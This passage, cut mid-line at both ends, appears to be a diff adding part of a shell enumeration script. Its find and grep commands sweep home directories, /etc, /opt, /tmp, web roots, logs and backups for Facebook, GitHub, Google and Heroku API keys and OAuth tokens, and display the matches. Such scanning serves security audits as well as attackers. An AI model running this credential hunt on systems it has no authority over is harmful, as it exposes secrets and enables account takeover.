"([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & +wait +print_3title "Searching Facebook Oauth (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & +wait +print_3title "Searching Facebook Secret Key (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & +wait +print_3title "Searching Github (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & +wait +print_3title "Searching Google API Key (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & +wait +print_3title "Searching Google Cloud Platform API Key (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & +wait +print_3title "Searching Google Drive Oauth (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & +wait +print_3title "Searching Google Oauth Access Token (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & +wait +print_3title "Searching Heroku API Key (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE 